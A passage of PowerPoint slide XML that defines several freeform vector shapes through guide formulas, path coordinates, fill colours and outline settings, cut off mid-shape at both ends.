                  <a:gd name="T3" fmla="*/ 59 h 69"/>
                  <a:gd name="T4" fmla="*/ 19 w 70"/>
                  <a:gd name="T5" fmla="*/ 53 h 69"/>
                  <a:gd name="T6" fmla="*/ 12 w 70"/>
                  <a:gd name="T7" fmla="*/ 45 h 69"/>
                  <a:gd name="T8" fmla="*/ 6 w 70"/>
                  <a:gd name="T9" fmla="*/ 39 h 69"/>
                  <a:gd name="T10" fmla="*/ 1 w 70"/>
                  <a:gd name="T11" fmla="*/ 36 h 69"/>
                  <a:gd name="T12" fmla="*/ 0 w 70"/>
                  <a:gd name="T13" fmla="*/ 34 h 69"/>
                  <a:gd name="T14" fmla="*/ 0 w 70"/>
                  <a:gd name="T15" fmla="*/ 33 h 69"/>
                  <a:gd name="T16" fmla="*/ 4 w 70"/>
                  <a:gd name="T17" fmla="*/ 32 h 69"/>
                  <a:gd name="T18" fmla="*/ 11 w 70"/>
                  <a:gd name="T19" fmla="*/ 32 h 69"/>
                  <a:gd name="T20" fmla="*/ 13 w 70"/>
                  <a:gd name="T21" fmla="*/ 30 h 69"/>
                  <a:gd name="T22" fmla="*/ 15 w 70"/>
                  <a:gd name="T23" fmla="*/ 27 h 69"/>
                  <a:gd name="T24" fmla="*/ 15 w 70"/>
                  <a:gd name="T25" fmla="*/ 20 h 69"/>
                  <a:gd name="T26" fmla="*/ 22 w 70"/>
                  <a:gd name="T27" fmla="*/ 20 h 69"/>
                  <a:gd name="T28" fmla="*/ 25 w 70"/>
                  <a:gd name="T29" fmla="*/ 16 h 69"/>
                  <a:gd name="T30" fmla="*/ 31 w 70"/>
                  <a:gd name="T31" fmla="*/ 19 h 69"/>
                  <a:gd name="T32" fmla="*/ 39 w 70"/>
                  <a:gd name="T33" fmla="*/ 12 h 69"/>
                  <a:gd name="T34" fmla="*/ 43 w 70"/>
                  <a:gd name="T35" fmla="*/ 6 h 69"/>
                  <a:gd name="T36" fmla="*/ 45 w 70"/>
                  <a:gd name="T37" fmla="*/ 4 h 69"/>
                  <a:gd name="T38" fmla="*/ 47 w 70"/>
                  <a:gd name="T39" fmla="*/ 4 h 69"/>
                  <a:gd name="T40" fmla="*/ 49 w 70"/>
                  <a:gd name="T41" fmla="*/ 5 h 69"/>
                  <a:gd name="T42" fmla="*/ 52 w 70"/>
                  <a:gd name="T43" fmla="*/ 6 h 69"/>
                  <a:gd name="T44" fmla="*/ 54 w 70"/>
                  <a:gd name="T45" fmla="*/ 6 h 69"/>
                  <a:gd name="T46" fmla="*/ 57 w 70"/>
                  <a:gd name="T47" fmla="*/ 4 h 69"/>
                  <a:gd name="T48" fmla="*/ 68 w 70"/>
                  <a:gd name="T49" fmla="*/ 0 h 69"/>
                  <a:gd name="T50" fmla="*/ 69 w 70"/>
                  <a:gd name="T51" fmla="*/ 4 h 69"/>
                  <a:gd name="T52" fmla="*/ 70 w 70"/>
                  <a:gd name="T53" fmla="*/ 7 h 69"/>
                  <a:gd name="T54" fmla="*/ 69 w 70"/>
                  <a:gd name="T55" fmla="*/ 10 h 69"/>
                  <a:gd name="T56" fmla="*/ 68 w 70"/>
                  <a:gd name="T57" fmla="*/ 16 h 69"/>
                  <a:gd name="T58" fmla="*/ 63 w 70"/>
                  <a:gd name="T59" fmla="*/ 21 h 69"/>
                  <a:gd name="T60" fmla="*/ 63 w 70"/>
                  <a:gd name="T61" fmla="*/ 27 h 69"/>
                  <a:gd name="T62" fmla="*/ 63 w 70"/>
                  <a:gd name="T63" fmla="*/ 34 h 69"/>
                  <a:gd name="T64" fmla="*/ 61 w 70"/>
                  <a:gd name="T65" fmla="*/ 42 h 69"/>
                  <a:gd name="T66" fmla="*/ 60 w 70"/>
                  <a:gd name="T67" fmla="*/ 47 h 69"/>
                  <a:gd name="T68" fmla="*/ 59 w 70"/>
                  <a:gd name="T69" fmla="*/ 57 h 69"/>
                  <a:gd name="T70" fmla="*/ 59 w 70"/>
                  <a:gd name="T71" fmla="*/ 61 h 69"/>
                  <a:gd name="T72" fmla="*/ 61 w 70"/>
                  <a:gd name="T73" fmla="*/ 65 h 69"/>
                  <a:gd name="T74" fmla="*/ 62 w 70"/>
                  <a:gd name="T75" fmla="*/ 67 h 69"/>
                  <a:gd name="T76" fmla="*/ 60 w 70"/>
                  <a:gd name="T77" fmla="*/ 69 h 69"/>
                  <a:gd name="T78" fmla="*/ 55 w 70"/>
                  <a:gd name="T79" fmla="*/ 68 h 69"/>
                  <a:gd name="T80" fmla="*/ 53 w 70"/>
                  <a:gd name="T81" fmla="*/ 65 h 69"/>
                  <a:gd name="T82" fmla="*/ 51 w 70"/>
                  <a:gd name="T83" fmla="*/ 65 h 69"/>
                  <a:gd name="T84" fmla="*/ 48 w 70"/>
                  <a:gd name="T85" fmla="*/ 65 h 69"/>
                  <a:gd name="T86" fmla="*/ 44 w 70"/>
                  <a:gd name="T87" fmla="*/ 66 h 69"/>
                  <a:gd name="T88" fmla="*/ 32 w 70"/>
                  <a:gd name="T89" fmla="*/ 62 h 69"/>
                  <a:gd name="T90" fmla="*/ 29 w 70"/>
                  <a:gd name="T91" fmla="*/ 64 h 69"/>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70"/>
                  <a:gd name="T139" fmla="*/ 0 h 69"/>
                  <a:gd name="T140" fmla="*/ 70 w 70"/>
                  <a:gd name="T141" fmla="*/ 69 h 69"/>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70" h="69">
                    <a:moveTo>
                      <a:pt x="29" y="64"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="26" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="64"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36180" name="Freeform 313"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1496" y="2645"/>
                <a:ext cx="32" cy="12"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 17 w 32"/>
                  <a:gd name="T1" fmla="*/ 12 h 12"/>
                  <a:gd name="T2" fmla="*/ 14 w 32"/>
                  <a:gd name="T3" fmla="*/ 12 h 12"/>
                  <a:gd name="T4" fmla="*/ 10 w 32"/>
                  <a:gd name="T5" fmla="*/ 10 h 12"/>
                  <a:gd name="T6" fmla="*/ 8 w 32"/>
                  <a:gd name="T7" fmla="*/ 8 h 12"/>
                  <a:gd name="T8" fmla="*/ 5 w 32"/>
                  <a:gd name="T9" fmla="*/ 5 h 12"/>
                  <a:gd name="T10" fmla="*/ 1 w 32"/>
                  <a:gd name="T11" fmla="*/ 4 h 12"/>
                  <a:gd name="T12" fmla="*/ 0 w 32"/>
                  <a:gd name="T13" fmla="*/ 3 h 12"/>
                  <a:gd name="T14" fmla="*/ 4 w 32"/>
                  <a:gd name="T15" fmla="*/ 1 h 12"/>
                  <a:gd name="T16" fmla="*/ 9 w 32"/>
                  <a:gd name="T17" fmla="*/ 0 h 12"/>
                  <a:gd name="T18" fmla="*/ 19 w 32"/>
                  <a:gd name="T19" fmla="*/ 2 h 12"/>
                  <a:gd name="T20" fmla="*/ 26 w 32"/>
                  <a:gd name="T21" fmla="*/ 5 h 12"/>
                  <a:gd name="T22" fmla="*/ 30 w 32"/>
                  <a:gd name="T23" fmla="*/ 7 h 12"/>
                  <a:gd name="T24" fmla="*/ 32 w 32"/>
                  <a:gd name="T25" fmla="*/ 9 h 12"/>
                  <a:gd name="T26" fmla="*/ 32 w 32"/>
                  <a:gd name="T27" fmla="*/ 10 h 12"/>
                  <a:gd name="T28" fmla="*/ 30 w 32"/>
                  <a:gd name="T29" fmla="*/ 11 h 12"/>
                  <a:gd name="T30" fmla="*/ 24 w 32"/>
                  <a:gd name="T31" fmla="*/ 9 h 12"/>
                  <a:gd name="T32" fmla="*/ 20 w 32"/>
                  <a:gd name="T33" fmla="*/ 9 h 12"/>
                  <a:gd name="T34" fmla="*/ 19 w 32"/>
                  <a:gd name="T35" fmla="*/ 11 h 12"/>
                  <a:gd name="T36" fmla="*/ 17 w 32"/>
                  <a:gd name="T37" fmla="*/ 12 h 1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2"/>
                  <a:gd name="T58" fmla="*/ 0 h 12"/>
                  <a:gd name="T59" fmla="*/ 32 w 32"/>
                  <a:gd name="T60" fmla="*/ 12 h 12"/>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2" h="12">
                    <a:moveTo>
                      <a:pt x="17" y="12"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="14" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="12"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36181" name="Freeform 314"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1496" y="2645"/>
                <a:ext cx="32" cy="12"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 17 w 32"/>
                  <a:gd name="T1" fmla="*/ 12 h 12"/>
                  <a:gd name="T2" fmla="*/ 14 w 32"/>
                  <a:gd name="T3" fmla="*/ 12 h 12"/>
                  <a:gd name="T4" fmla="*/ 10 w 32"/>
                  <a:gd name="T5" fmla="*/ 10 h 12"/>
                  <a:gd name="T6" fmla="*/ 8 w 32"/>
                  <a:gd name="T7" fmla="*/ 8 h 12"/>
                  <a:gd name="T8" fmla="*/ 5 w 32"/>
                  <a:gd name="T9" fmla="*/ 5 h 12"/>
                  <a:gd name="T10" fmla="*/ 1 w 32"/>
                  <a:gd name="T11" fmla="*/ 4 h 12"/>
                  <a:gd name="T12" fmla="*/ 0 w 32"/>
                  <a:gd name="T13" fmla="*/ 3 h 12"/>
                  <a:gd name="T14" fmla="*/ 4 w 32"/>
                  <a:gd name="T15" fmla="*/ 1 h 12"/>
                  <a:gd name="T16" fmla="*/ 9 w 32"/>
                  <a:gd name="T17" fmla="*/ 0 h 12"/>
                  <a:gd name="T18" fmla="*/ 19 w 32"/>
                  <a:gd name="T19" fmla="*/ 2 h 12"/>
                  <a:gd name="T20" fmla="*/ 26 w 32"/>
                  <a:gd name="T21" fmla="*/ 5 h 12"/>
                  <a:gd name="T22" fmla="*/ 30 w 32"/>
                  <a:gd name="T23" fmla="*/ 7 h 12"/>
                  <a:gd name="T24" fmla="*/ 32 w 32"/>
                  <a:gd name="T25" fmla="*/ 9 h 12"/>
                  <a:gd name="T26" fmla="*/ 32 w 32"/>
                  <a:gd name="T27" fmla="*/ 10 h 12"/>
                  <a:gd name="T28" fmla="*/ 30 w 32"/>
                  <a:gd name="T29" fmla="*/ 11 h 12"/>
                  <a:gd name="T30" fmla="*/ 24 w 32"/>
                  <a:gd name="T31" fmla="*/ 9 h 12"/>
                  <a:gd name="T32" fmla="*/ 20 w 32"/>
                  <a:gd name="T33" fmla="*/ 9 h 12"/>
                  <a:gd name="T34" fmla="*/ 19 w 32"/>
                  <a:gd name="T35" fmla="*/ 11 h 12"/>
                  <a:gd name="T36" fmla="*/ 17 w 32"/>
                  <a:gd name="T37" fmla="*/ 12 h 1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2"/>
                  <a:gd name="T58" fmla="*/ 0 h 12"/>
                  <a:gd name="T59" fmla="*/ 32 w 32"/>
                  <a:gd name="T60" fmla="*/ 12 h 12"/>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2" h="12">
                    <a:moveTo>
                      <a:pt x="17" y="12"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="14" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="12"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36182" name="Freeform 315"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1321" y="2687"/>
                <a:ext cx="95" cy="48"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 17 w 95"/>
                  <a:gd name="T1" fmla="*/ 4 h 48"/>
                  <a:gd name="T2" fmla="*/ 20 w 95"/>
                  <a:gd name="T3" fmla="*/ 4 h 48"/>
                  <a:gd name="T4" fmla="*/ 24 w 95"/>
                  <a:gd name="T5" fmla="*/ 2 h 48"/>
                  <a:gd name="T6" fmla="*/ 28 w 95"/>
                  <a:gd name="T7" fmla="*/ 1 h 48"/>
                  <a:gd name="T8" fmla="*/ 34 w 95"/>
                  <a:gd name="T9" fmla="*/ 2 h 48"/>
                  <a:gd name="T10" fmla="*/ 37 w 95"/>
                  <a:gd name="T11" fmla="*/ 3 h 48"/>
                  <a:gd name="T12" fmla="*/ 47 w 95"/>
                  <a:gd name="T13" fmla="*/ 3 h 48"/>
                  <a:gd name="T14" fmla="*/ 52 w 95"/>
                  <a:gd name="T15" fmla="*/ 1 h 48"/>
                  <a:gd name="T16" fmla="*/ 55 w 95"/>
                  <a:gd name="T17" fmla="*/ 0 h 48"/>
                  <a:gd name="T18" fmla="*/ 59 w 95"/>
                  <a:gd name="T19" fmla="*/ 2 h 48"/>
                  <a:gd name="T20" fmla="*/ 65 w 95"/>
                  <a:gd name="T21" fmla="*/ 2 h 48"/>
                  <a:gd name="T22" fmla="*/ 70 w 95"/>
                  <a:gd name="T23" fmla="*/ 1 h 48"/>
                  <a:gd name="T24" fmla="*/ 75 w 95"/>
                  <a:gd name="T25" fmla="*/ 1 h 48"/>
                  <a:gd name="T26" fmla="*/ 78 w 95"/>
                  <a:gd name="T27" fmla="*/ 2 h 48"/>
                  <a:gd name="T28" fmla="*/ 82 w 95"/>
                  <a:gd name="T29" fmla="*/ 4 h 48"/>
                  <a:gd name="T30" fmla="*/ 82 w 95"/>
                  <a:gd name="T31" fmla="*/ 6 h 48"/>
                  <a:gd name="T32" fmla="*/ 81 w 95"/>
                  <a:gd name="T33" fmla="*/ 8 h 48"/>
                  <a:gd name="T34" fmla="*/ 83 w 95"/>
                  <a:gd name="T35" fmla="*/ 10 h 48"/>
                  <a:gd name="T36" fmla="*/ 89 w 95"/>
                  <a:gd name="T37" fmla="*/ 12 h 48"/>
                  <a:gd name="T38" fmla="*/ 93 w 95"/>
                  <a:gd name="T39" fmla="*/ 12 h 48"/>
                  <a:gd name="T40" fmla="*/ 95 w 95"/>
                  <a:gd name="T41" fmla="*/ 16 h 48"/>
                  <a:gd name="T42" fmla="*/ 84 w 95"/>
                  <a:gd name="T43" fmla="*/ 20 h 48"/>
                  <a:gd name="T44" fmla="*/ 81 w 95"/>
                  <a:gd name="T45" fmla="*/ 22 h 48"/>
                  <a:gd name="T46" fmla="*/ 79 w 95"/>
                  <a:gd name="T47" fmla="*/ 22 h 48"/>
                  <a:gd name="T48" fmla="*/ 76 w 95"/>
                  <a:gd name="T49" fmla="*/ 21 h 48"/>
                  <a:gd name="T50" fmla="*/ 74 w 95"/>
                  <a:gd name="T51" fmla="*/ 20 h 48"/>
                  <a:gd name="T52" fmla="*/ 72 w 95"/>
                  <a:gd name="T53" fmla="*/ 20 h 48"/>
                  <a:gd name="T54" fmla="*/ 70 w 95"/>
                  <a:gd name="T55" fmla="*/ 22 h 48"/>
                  <a:gd name="T56" fmla="*/ 66 w 95"/>
                  <a:gd name="T57" fmla="*/ 28 h 48"/>
                  <a:gd name="T58" fmla="*/ 58 w 95"/>
                  <a:gd name="T59" fmla="*/ 35 h 48"/>
                  <a:gd name="T60" fmla="*/ 52 w 95"/>
                  <a:gd name="T61" fmla="*/ 32 h 48"/>
                  <a:gd name="T62" fmla="*/ 49 w 95"/>
                  <a:gd name="T63" fmla="*/ 36 h 48"/>
                  <a:gd name="T64" fmla="*/ 42 w 95"/>
                  <a:gd name="T65" fmla="*/ 36 h 48"/>
                  <a:gd name="T66" fmla="*/ 42 w 95"/>
                  <a:gd name="T67" fmla="*/ 43 h 48"/>
                  <a:gd name="T68" fmla="*/ 40 w 95"/>
                  <a:gd name="T69" fmla="*/ 46 h 48"/>
                  <a:gd name="T70" fmla="*/ 38 w 95"/>
                  <a:gd name="T71" fmla="*/ 48 h 48"/>
                  <a:gd name="T72" fmla="*/ 31 w 95"/>
                  <a:gd name="T73" fmla="*/ 48 h 48"/>
                  <a:gd name="T74" fmla="*/ 29 w 95"/>
                  <a:gd name="T75" fmla="*/ 44 h 48"/>
                  <a:gd name="T76" fmla="*/ 29 w 95"/>
                  <a:gd name="T77" fmla="*/ 43 h 48"/>
                  <a:gd name="T78" fmla="*/ 25 w 95"/>
                  <a:gd name="T79" fmla="*/ 41 h 48"/>
                  <a:gd name="T80" fmla="*/ 26 w 95"/>
                  <a:gd name="T81" fmla="*/ 35 h 48"/>
                  <a:gd name="T82" fmla="*/ 25 w 95"/>
                  <a:gd name="T83" fmla="*/ 34 h 48"/>
                  <a:gd name="T84" fmla="*/ 23 w 95"/>
                  <a:gd name="T85" fmla="*/ 34 h 48"/>
                  <a:gd name="T86" fmla="*/ 19 w 95"/>
                  <a:gd name="T87" fmla="*/ 32 h 48"/>
                  <a:gd name="T88" fmla="*/ 16 w 95"/>
                  <a:gd name="T89" fmla="*/ 35 h 48"/>
                  <a:gd name="T90" fmla="*/ 14 w 95"/>
                  <a:gd name="T91" fmla="*/ 34 h 48"/>
                  <a:gd name="T92" fmla="*/ 13 w 95"/>
                  <a:gd name="T93" fmla="*/ 32 h 48"/>
                  <a:gd name="T94" fmla="*/ 9 w 95"/>
                  <a:gd name="T95" fmla="*/ 30 h 48"/>
                  <a:gd name="T96" fmla="*/ 6 w 95"/>
                  <a:gd name="T97" fmla="*/ 29 h 48"/>
                  <a:gd name="T98" fmla="*/ 5 w 95"/>
                  <a:gd name="T99" fmla="*/ 26 h 48"/>
                  <a:gd name="T100" fmla="*/ 0 w 95"/>
                  <a:gd name="T101" fmla="*/ 25 h 48"/>
                  <a:gd name="T102" fmla="*/ 3 w 95"/>
                  <a:gd name="T103" fmla="*/ 23 h 48"/>
                  <a:gd name="T104" fmla="*/ 2 w 95"/>
                  <a:gd name="T105" fmla="*/ 18 h 48"/>
                  <a:gd name="T106" fmla="*/ 3 w 95"/>
                  <a:gd name="T107" fmla="*/ 15 h 48"/>
                  <a:gd name="T108" fmla="*/ 7 w 95"/>
                  <a:gd name="T109" fmla="*/ 13 h 48"/>
                  <a:gd name="T110" fmla="*/ 17 w 95"/>
                  <a:gd name="T111" fmla="*/ 4 h 48"/>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95"/>
                  <a:gd name="T169" fmla="*/ 0 h 48"/>
                  <a:gd name="T170" fmla="*/ 95 w 95"/>
                  <a:gd name="T171" fmla="*/ 48 h 48"/>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95" h="48">
                    <a:moveTo>
                      <a:pt x="17" y="4"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="20" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="32"/>
                    </a:lnTo>
